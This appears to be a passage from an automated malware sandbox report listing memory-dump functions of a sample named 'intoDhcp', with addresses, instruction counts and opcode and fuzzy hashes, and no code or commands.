                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 952f4487c2e3833f348dba2500743b5b2b4ee5c5f1779e6835235b3bccf4fe5b
                  • Instruction ID: 46920aa5e672d2a2db06532bd9687ea4d3baa22184a9a1bc486d65c17c41d5e6
                  • Opcode Fuzzy Hash: 952f4487c2e3833f348dba2500743b5b2b4ee5c5f1779e6835235b3bccf4fe5b
                  • Instruction Fuzzy Hash: E321A231A0991E8FDB98EFA8D864AFEB7E0FF58304F10017AE45AE3191DE756544C790
                  Function 00007FFD9BA034A8 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ce9faed70555e81db79b74ffde4884720b415dc85cbfbe46c3512e455d825ae
                  • Instruction ID: 91ebefcfa364a075a85b4b30347b71d8580e3c9f97f3be549dc5849811f4e0f7
                  • Opcode Fuzzy Hash: 5ce9faed70555e81db79b74ffde4884720b415dc85cbfbe46c3512e455d825ae
                  • Instruction Fuzzy Hash: 4F21AF3094E68A8FD752EBB488685A97FF0EF0B310F1905F6D099DB0B2DA78A545C711
                  Function 00007FFD9BA0D568 Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d11da3a364049ece9016f249a1f6abdddfef6ca23f43d685aa1d0e2b929c423f
                  • Instruction ID: dee1e4f20e4c28cdae21d97fff2c87cf5eff3ba47b4633d4143bd3c1d297e9c1
                  • Opcode Fuzzy Hash: d11da3a364049ece9016f249a1f6abdddfef6ca23f43d685aa1d0e2b929c423f
                  • Instruction Fuzzy Hash: 53216F31A0950E8FEB64EB94C4656BD77F0FF19304F12053AD88AD72A4DEB5A6448B80
                  Function 00007FFD9BA00A01 Relevance: .1, Instructions: 66COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a13efe2dd02f4c5d0e99af14d77e818b859b1f455245eafa9bc72fe3a81743b
                  • Instruction ID: 46a858781e1d24f4ff904f3ce5412994e90906dbbd6fe17a3d68dc66df451134
                  • Opcode Fuzzy Hash: 6a13efe2dd02f4c5d0e99af14d77e818b859b1f455245eafa9bc72fe3a81743b
                  • Instruction Fuzzy Hash: F911E730E0960E4FE7A0EBA8C8581FD7BE1FF59300F4245B6D459C31A6EE78A5448740
                  Function 00007FFD9BA0B2D8 Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b31d7e123361a4b09b5ff0e1ea60cbc190a59143c6060295447035290bfae195
                  • Instruction ID: ed8582cf0a7ad545756b6dae3bd3568944fdd273b4f293329fa926a1961613d6
                  • Opcode Fuzzy Hash: b31d7e123361a4b09b5ff0e1ea60cbc190a59143c6060295447035290bfae195
                  • Instruction Fuzzy Hash: C6219D30E0D20F8EFB60EBA0C5547FE76E1AF56300F664575C059931A5EFB8A6888B41
                  Function 00007FFD9BA0CBBF Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 017b11685272b525a9aae9f574cf61d69fb3069abc5d8c607e3a3554952dec5d
                  • Instruction ID: b01b22a5eb9740dc3a9047b7d228f829a99f7f0026ad2ee96f94dcedc4c5f2dd
                  • Opcode Fuzzy Hash: 017b11685272b525a9aae9f574cf61d69fb3069abc5d8c607e3a3554952dec5d
                  • Instruction Fuzzy Hash: CD115130A0E28F4FE722ABA498705FA7FB09F46310F1510B7D449D7192DA685E54C791
                  Function 00007FFD9BA02C98 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 01980ac8e62e1822c68686ce14eb4fed24fd9dccccec6cd352d3be42f9f2bd47
                  • Instruction ID: 416865e3adcc68dbf6bb64285ab98c87d0bb0f57d248436f04eccae35af3b883
                  • Opcode Fuzzy Hash: 01980ac8e62e1822c68686ce14eb4fed24fd9dccccec6cd352d3be42f9f2bd47
                  • Instruction Fuzzy Hash: 69110A30A1460E8FDB98EF58C495ABE37F0FF19305F11456AE85ED3265DB70A551CB80
                  Function 00007FFD9BA0A711 Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 898fd941e0f5bdcde0c257d8c3e548268063c340c76f5b7d055a802e732ba9d0
                  • Instruction ID: f9475431a17ddc2026dacd0367e06ba1e61ffb40e1f2da78662c625253f0fb21
                  • Opcode Fuzzy Hash: 898fd941e0f5bdcde0c257d8c3e548268063c340c76f5b7d055a802e732ba9d0
                  • Instruction Fuzzy Hash: A9117C7091864D8FDF84EF68C855AEA3BF0FF29305F02016AE849C7261DB74E950CB81
                  Function 00007FFD9BA0121D Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc5191aec886689aaf4448886d55a15ab9be05cbd5a09c226c8a725e627521f4
                  • Instruction ID: 0044866cff9ee8c5a9d45210e1493886f80bb38f28395b6deb9c2454c1deae51
                  • Opcode Fuzzy Hash: cc5191aec886689aaf4448886d55a15ab9be05cbd5a09c226c8a725e627521f4
                  • Instruction Fuzzy Hash: 57118670A0A64E8FEB65EBA884B82F97BE0EF6A304F45057EE499C60E1DE7595448700
                  Function 00007FFD9BA0CED0 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95ce0a7bf90e72dfbde7157b1f8f4eceb4acc68d72036acdb66400a022259481
                  • Instruction ID: 66da27562f5e43285dc63f703fdcbce33936d167d9b2c66a15ab313e56f3241e
                  • Opcode Fuzzy Hash: 95ce0a7bf90e72dfbde7157b1f8f4eceb4acc68d72036acdb66400a022259481
                  • Instruction Fuzzy Hash: 23119170A09A0E9EEBA8EF68C4696BE77E1FF18304F10157ED41EC21A5CE75A644C780
                  Function 00007FFD9BA0CAE0 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 942e953fa45fbbed7e60de20078244d3c4ca20dbdbe64ee4671468c17d34bfa6
                  • Instruction ID: 71aaa06cedf7715e38cdb86196e7932ec65b9acccc0acc262b4295853c5e056a
                  • Opcode Fuzzy Hash: 942e953fa45fbbed7e60de20078244d3c4ca20dbdbe64ee4671468c17d34bfa6
                  • Instruction Fuzzy Hash: B6119130A0E64E4FDB56EB68C8685B97BB0FF1A300F0504BBD459C70A2EE795A84C740
                  Function 00007FFD9BA02F0A Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6eb3c64e01307bcd5a70790c4aec4694a8cf2ba0647f685540ba8a899bd7020
                  • Instruction ID: 38bd5d7ccff1d43461131edac24c274ea11a41bf457fdf1e7a4e6f1da6b9473e
                  • Opcode Fuzzy Hash: e6eb3c64e01307bcd5a70790c4aec4694a8cf2ba0647f685540ba8a899bd7020
                  • Instruction Fuzzy Hash: BC01B930E4E74D5FD761EBB4C4595A97BF0FF06340F0645BAD498C30B2DA74A1588701
                  Function 00007FFD9BA0BD95 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 274a1ec006e13b1ccf0d63c318f00b10595bb13dacf6d83452c5e59d728d0272
                  • Instruction ID: babd93b6158e4ecd44b062ea7811017d0ac5996d97f8a3536337e006893c8474
                  • Opcode Fuzzy Hash: 274a1ec006e13b1ccf0d63c318f00b10595bb13dacf6d83452c5e59d728d0272
                  • Instruction Fuzzy Hash: 5611A130A0A64E8FEB94EF68C4682BDBBE0FF19300F8104BED45AC31A1DB75A650C700
                  Function 00007FFD9BA0D79D Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 137ffa5fb3e015701f740f3d14086dd92bd72d54ad6203c706302396bdeecd36
                  • Instruction ID: 02dc40b31a0b8ea509f15e4abec3134afbd2f888ce7b4718bae70c5d5b76063f
                  • Opcode Fuzzy Hash: 137ffa5fb3e015701f740f3d14086dd92bd72d54ad6203c706302396bdeecd36
                  • Instruction Fuzzy Hash: F9115B30A0964E8FDB64EF68C4696BD7BB0FF19304F5104BED86AC61A2DB75A654CB00
                  Function 00007FFD9BA005D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction ID: eceb38f3c78a6f6ca8ebaa4d322322ac93c3e8b93270a6531754d0026d31910f
                  • Opcode Fuzzy Hash: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction Fuzzy Hash: 29019E30A0950E8FDB98EF68C4656FA77A1FF6A304F11447EE41EC31A4CE75A650CB40
                  Function 00007FFD9BA0B038 Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6f16cfb11e5544af8d2e6291a0c66df6a4507c03e3b629c2618964fd3b09832
                  • Instruction ID: e089f002e832b4b8c1fde4b67a6dbfa3f00acbdc1058c82e99ba9e1b0c8b5989
                  • Opcode Fuzzy Hash: b6f16cfb11e5544af8d2e6291a0c66df6a4507c03e3b629c2618964fd3b09832
                  • Instruction Fuzzy Hash: 67015E30A1550E8EEB54FBA8C4686BE76E0FF19304F11057EE45ED25A1EE75A250C740
                  Function 00007FFD9BA0C5A0 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ca6d5098c7c1c4e821a120653c4d016b2759126d5451633105e1eb344e73c68
                  • Instruction ID: c712e5293f5dd6774b7ec103b10afe9ccd3a38914dc2aee9c1d0a16df519b69f
                  • Opcode Fuzzy Hash: 3ca6d5098c7c1c4e821a120653c4d016b2759126d5451633105e1eb344e73c68
                  • Instruction Fuzzy Hash: 71017C30A5590E8FEB98EF68C8696BE77E0FF18304F10087AE41EC21A4EF74A250C700
                  Function 00007FFD9BA01CE1 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction ID: d9d91717550e1a68ec71c828ab80d32755691ac30a05bbf854faf5af5efd2a3e
                  • Opcode Fuzzy Hash: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction Fuzzy Hash: BD01A430A0A68E8FDB99DF64C4656FA3BA0FF67304F5100BAE849C71A2DB79D550CB40
                  Function 00007FFD9BA028ED Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction ID: 3989762ac11004b0eaa80af4d562c41a92e76558984772af5090ed4a5152767f
                  • Opcode Fuzzy Hash: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction Fuzzy Hash: 85018F30E0A74E4FE762EBA484686BA7BE0EF1A300F4645B6D448C70B6EE74E244C741
                  Function 00007FFD9BA0AC59 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6b35695616bbf6a424a5616f2c4948fccd00c1295876083e1c15cf5223c97d5
                  • Instruction ID: ffba3c373b959de7c92feb1e18efe9e44023493c2ae2f8ae5feebe8dea0fc770
                  • Opcode Fuzzy Hash: b6b35695616bbf6a424a5616f2c4948fccd00c1295876083e1c15cf5223c97d5
                  • Instruction Fuzzy Hash: 6F01A730A4E34E4FD762EBB4C4695A97BE0EF16300F0705F6D448C70B6DA74E6448701
                  Function 00007FFD9BA02F89 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction ID: 0fa0816c6ec59418387225229326990d770d17c02122b9ed9fbd8a1e70a2732c
                  • Opcode Fuzzy Hash: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction Fuzzy Hash: 1001D870A0E74D4FE752A7B488695A97FE0EF16340F0604F6D489C70B6DA74A5548301
                  Function 00007FFD9BA276C0 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc5545c9196207462939d0ddd22f8fe183b18ca05134625d5e77c1b1547f3465
                  • Instruction ID: e3ff6a9c90bf1a155eddd610e4cd9c898cff6218b43fa57f368472e7d0ef44a9
                  • Opcode Fuzzy Hash: cc5545c9196207462939d0ddd22f8fe183b18ca05134625d5e77c1b1547f3465
                  • Instruction Fuzzy Hash: 6D016D30A5990E8EEB90FBB8C9585BA76E0FF19304F0149B6E419C3065EE74AA848A00
                  Function 00007FFD9BA00608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction ID: 1a49523b88ca883c63227a04d6f2751f06d5b42cea8c07dcd51b9c50f1b64c3c
                  • Opcode Fuzzy Hash: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction Fuzzy Hash: 7A01AD34A1970E8BEB68EFA4C0286BD33A0FF19304F1008BEE41EC21E4DE75A248C600
                  Function 00007FFD9BA00610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
                  • Instruction ID: aff08f8189602897cabc7ea848cd11ac56180d199e2ffaa4005a81f7d89233cd
                  • Opcode Fuzzy Hash: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
                  • Instruction Fuzzy Hash: A201AD30A09B0E8AEB59EBA4C0286B973A0FF09305F1008BEE41EC21E4CF75A284C600
                  Function 00007FFD9BA0ACC5 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8160bd0a509a1bd0c0558b8a6aff928c6142a3029ce1501679f35c174c3c7250
                  • Instruction ID: 7a5dc19bb75f60857ee39450c56a85434441f4b3a978e89c09e530424d9ddd37
                  • Opcode Fuzzy Hash: 8160bd0a509a1bd0c0558b8a6aff928c6142a3029ce1501679f35c174c3c7250
                  • Instruction Fuzzy Hash: 6E018121A1F38E4FD362ABA498A51E93BB0AF43314F4B05F7D0C9C60B3D96995488351
                  Function 00007FFD9BA01230 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction ID: 62febb663c3a87fca44421adda7508274f9889dea85ef3867508e6275a24786a
                  • Opcode Fuzzy Hash: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction Fuzzy Hash: 70F0A970F1A54F4AEF649BA888682FA77E4EF6B204F01043AF49DC20E1DE7456448240
                  Function 00007FFD9BA0AD28 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00a22a7fcc181ec275077399baa949711d0edf00d418930f026b4f3dab33b499
                  • Instruction ID: acb23ad5715f689e05a267c10e5e7e406cb459e8037dff4acef0aa71c5c50e3a
                  • Opcode Fuzzy Hash: 00a22a7fcc181ec275077399baa949711d0edf00d418930f026b4f3dab33b499
                  • Instruction Fuzzy Hash: 14F0A930A5560E5BDB98EFB4C4B55BA77A0FF04318F11147DD41ED20E1DE75A250C640
                  Function 00007FFD9BA0C9B5 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd353f10bbf2ae7a7c1925e1c484b674fc9516bebfad8b96b43cd7f88bbdc7c7
                  • Instruction ID: cf537b70505ea38a0f3680d7348dfaa483dc2b9bb3b772d815a647a87776e3c4
                  • Opcode Fuzzy Hash: bd353f10bbf2ae7a7c1925e1c484b674fc9516bebfad8b96b43cd7f88bbdc7c7
                  • Instruction Fuzzy Hash: DCF0E130A1560E8FDBA5EFA8C4556BE77E0FF14345F50057EE819C2560DB78A6908B80
                  Function 00007FFD9BA0C219 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8263c2e7f8d9968436d36cf40347db239cf40cbf622df61a790a18a98428e3c1
                  • Instruction ID: 928302e9b3ba51749f8b35cc7d0728277710ab1c2b84b19ff1aedf31911e8489
                  • Opcode Fuzzy Hash: 8263c2e7f8d9968436d36cf40347db239cf40cbf622df61a790a18a98428e3c1
                  • Instruction Fuzzy Hash: FE01DB3090E78D4FDB55EF6488691B93FB0FF1A300F4601BBD458C61A2DB785644C740
                  Function 00007FFD9BA00FB4 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dad3b882977db8d8c915b07ab60019877fc714fa8732a5984fdc30d5ef6690bd
                  • Instruction ID: 9cf2f52c041d998eb595e51efc6f2499b04961ed2b7a41874e9e6276ed7c0412
                  • Opcode Fuzzy Hash: dad3b882977db8d8c915b07ab60019877fc714fa8732a5984fdc30d5ef6690bd
                  • Instruction Fuzzy Hash: D0011D30F0560E8BEB60EB58C890AEEB3B1EB55311F1181B6D419E7294DE75AE448F84
                  Function 00007FFD9BA0B37F Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb11d177a6c9246dc4f8574ff7f0509c8afc3f555663255bcc2fdaf57a418082
                  • Instruction ID: 94221723537326b479296f3ec7e53d8d9e544236aca7b2ed7e7e2c4256520b7b
                  • Opcode Fuzzy Hash: bb11d177a6c9246dc4f8574ff7f0509c8afc3f555663255bcc2fdaf57a418082
                  • Instruction Fuzzy Hash: 3C017170E0961E8FDB24DF90C490AFEB3B1EF55300F604676C409A2295DF78AA85CB80
                  Function 00007FFD9BA02809 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction ID: e9ded1e7a39c2288d19f58994c3d64cc1434d502ad49feb5176d5f7f83747c58
                  • Opcode Fuzzy Hash: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction Fuzzy Hash: 15F0963490E38D8FD76A9F7088251A93F60BF56201F4604FAE449C61F2DB78D558C701
                  Function 00007FFD9BA0287D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
